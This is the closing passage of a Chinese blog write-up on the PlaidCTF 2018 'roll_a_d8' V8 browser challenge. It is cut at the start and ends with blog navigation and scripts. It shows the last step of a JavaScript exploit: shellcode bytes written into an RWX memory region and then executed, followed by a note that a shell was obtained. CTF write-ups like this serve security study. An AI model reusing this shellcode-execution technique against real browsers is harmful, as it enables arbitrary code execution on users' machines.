<span class="number">106</span>, <span class="number">8</span>, <span class="number">94</span>, <span class="number">72</span>, <span class="number">1</span>, <span class="number">230</span>, <span class="number">86</span>, <span class="number">72</span>, <span class="number">137</span>, <span class="number">230</span>, <span class="number">49</span>, <span class="number">210</span>, <span class="number">106</span>, <span class="number">59</span>, <span class="number">88</span>, <span class="number">15</span>, <span class="number">5</span>];</span><br><span class="line"></span><br><span class="line">dataview_write(rwx_addr, shellcode);</span><br><span class="line">func();</span><br><span class="line"><span class="comment">//%SystemBreak();</span></span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"debug"</span>);</span><br></pre></td></tr></table></figure>

<p>最后getshell，比之前的getshell的界面整洁多了：</p>
<p><img src="/2020/06/14/plaidctf2018-roll_a_d8/image-20200614213832008.png" alt="image-20200614213832008"></p>
<h2 id="写在最后"><a href="#写在最后" class="headerlink" title="写在最后"></a>写在最后</h2><p>如有错误欢迎指正：<a href="mailto:sofr@foxmail.com">sofr@foxmail.com</a></p>
<p>之前文章：</p>
<p><a href="http://pwn.sofr.website/2020/06/01/v8开坑/" target="_blank" rel="noopener">v8开坑+starCTF2019 oob</a></p>
<p><a href="http://pwn.sofr.website/2020/06/06/数字经济/" target="_blank" rel="noopener">数字经济final-browser</a></p>
	  
	</div>

	<div>
  	<center>
	<div class="pagination">

    
    
    <a type="button" class="btn btn-default disabled"><i class="fa fa-arrow-circle-o-left"></i>Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2020/06/06/数字经济/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>

    </center>
	</div>
	
	<!-- comment -->
	
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>


	</div> <!-- col-md-9/col-md-12 -->
		
	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2020-06-14 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/pwn/">pwn<span>8</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/browser/">browser<span>3</span></a></li> <li><a href="/tags/v8/">v8<span>3</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#前言"><span class="toc-article-text">前言</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#题目信息"><span class="toc-article-text">题目信息</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#思路"><span class="toc-article-text">思路</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#写在最后"><span class="toc-article-text">写在最后</span></a></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

	</div>
		

</div><!-- row -->



	</div>
  </div>
  <div class="container-narrow">
  <footer>  </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
